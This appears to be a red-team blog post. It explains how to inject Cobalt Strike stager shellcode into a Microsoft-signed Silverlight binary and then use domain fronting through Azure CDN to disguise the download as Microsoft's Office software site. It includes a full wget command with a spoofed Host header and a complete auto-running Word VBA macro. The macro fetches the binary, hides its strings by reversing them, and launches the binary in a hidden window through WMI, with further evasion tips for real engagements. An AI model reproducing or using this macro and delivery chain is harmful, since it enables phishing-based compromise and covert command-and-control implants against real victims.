This blog post is about how to create a binary that mimics an original signed binary, injected with both DNS and HTTPs Cobalt Strike stager shellcode, and then to deliver it via a Word Macro that uses domain fronting to request the binary from a legitimate Microsoft domain.
We will be using Cobalt Strike, AWS, Microsoft Azure, and the free version of the PE injection tool Shellter. While the full premium edition of Shellter would allow us to inject more shellcode and inject a stageless payload enabling us to use Domain fronting for our C2, we will focus on a basic overview of how to deliver an implant that reaches out to both DNS and HTTPS teamservers simultaneously.
Below is a network diagram of the command and control infrastructure. We have three teamservers, two Cobalt Strike teamservers, DNS and HTTPS respectively, and a file server containing the executable.
I am going to assume that you know how to create domains, ec2 instances and to configure teamservers and NGINX. If you have set them up correctly you can connect to the GUI and sit on both teamservers at the same time.
In this example for simplicity i am not using any DNS or HTTPS redirectors but you can configure these relatively easily.
Next you will want to grab Shellter from here.
Now we will want to find a binary to inject shellcode into that is digitally signed by Microsoft or another legitimate organisation. Ideally a good binary would be:
1. Non default operating system binary
2. Doesn't require elevation
3. Is possible to run from the command line and to hide the window
4. Less than 3mb
5. Likely to be found on a corporate workstation - such as graphics drivers, power management, etc.
I am however in this example going to use a Microsoft Silver Light launcher binary:
If we view the certificate we can see that this is digitally signed by Microsoft.
Next we will want to generate the DNS and HTTPS Cobalt Strike shellcode. As mentioned before we can only use staged payloads with the free version of Shellter.
So we go to:
And save them to disk and repeat for both HTTPS.
Next run the Shelter executable and use the follow the prompts as below to inject the first shellocde into the binary (select the same options):
Now we can test the execution of and see that we can get a beacon while retaining the original functionality of the application:
Now we need to repeat the process and inject the DNS staging shellcode into the same binary. Simply follow the steps you did before
Now when we run the binary, you will see a beacon on both teamservers:
Now let's move onto the next step. We have a binary configured and would like to Domain Front that binary via Azure CDN so that it looks like it is coming from software-download.office.microsoft.com.
Therefore if we create an AWS ec2 instance and point a domain at it, then the steps here in this blog post will enable you to get the domain fronting working. You can follow the steps here.
Now that we have the domain fronting working, we should be able to make to the following wget request and download the binary from our staging server via the CDN:
wget https://software-download.office.microsoft.com/update/silverlight/2018/sllauncher.exe --header "Host: hackerjobsblogpost.azureedge.net"
We can see in the image below that we have successfully downloaded the binary from out AWS ec2 instance via Azure's CDN:
Next we will make a basic macro that will download the binary when run into the Local AppData folder and then run it. If we look at a previous post where we constructed a simple macro using some more advanced concepts we can take the following VBA snippets from there and construct the macro as below:
Sub Run() Dim payload As String Dim Value As String Dim Value2 As String Dim URL As String Dim namePrefix As String Dim nameSuffix As String Dim zzz As String Dim dollop As Object Dim dstPath As String Dim savePath As String Dim abc As String namePrefix = "sllauncher-actual" nameSuffix = ".exe" payload = "https://software-download.office.microsoft.com/update/silverlight/2018/sllauncher.exe" zzz = payload Dim downloadf Dim bStrm Dim filename ''' here need to use WinHttp.WinHttpRequest.5.1 Set downloadf = CreateObject("WinHttp.WinHttpRequest.5.1") downloadf.Open "GET", zzz, False ''' here we need to add the host header downloadf.setRequestHeader "Host", "hackerjobsblogpost.azureedge.net" downloadf.Send Set dollop = CreateObject(StrReverse("maertS.bdodA")) dollop.Type = 1 dollop.Open dollop.Write downloadf.responseBody dstPath = Environ$("TEMP") & "\" & namePrefix & nameSuffix savePath = dstPath dollop.savetofile savePath, 2 Const HIDDEN_WINDOW = 0 strComputer = "." binary = dstPath strGetObject = StrReverse("2vmic\toor\.\\:stmgmniw") Set objWMIService = GetObject(strGetObject) Set objStartup = objWMIService.Get(StrReverse("putratSssecorP_23niW")) Set objConfig = objStartup.SpawnInstance_ objConfig.ShowWindow = HIDDEN_WINDOW Set objProcess = GetObject(strGetObject & StrReverse("ssecorP_23niW:")) objProcess.Create binary, Null, objConfig, intProcessID End Sub Sub Auto_Open() Run End Sub
As you can see this macro makes a request to "https://software-download.office.microsoft.com/update/silverlight/2018/sllauncher.exe" and with the host header set as hackerjobsblogpost.azureedge.net, which in turn points to our AWS instance - we are downloading the binary from what it will appear as the official Microsoft Office software download page.
If this were an actual engagement, we would want to do a few things - namely encrypt and environmentally key the URL, and also obfuscate the host header so that only when the request is made does it decode. Also using WinHTTP is not proxy aware so you would need to use a workaround that we will discuss in a later blog post.
When we now run the word document, we get a beacon on HTTPS and DNS simultaneously: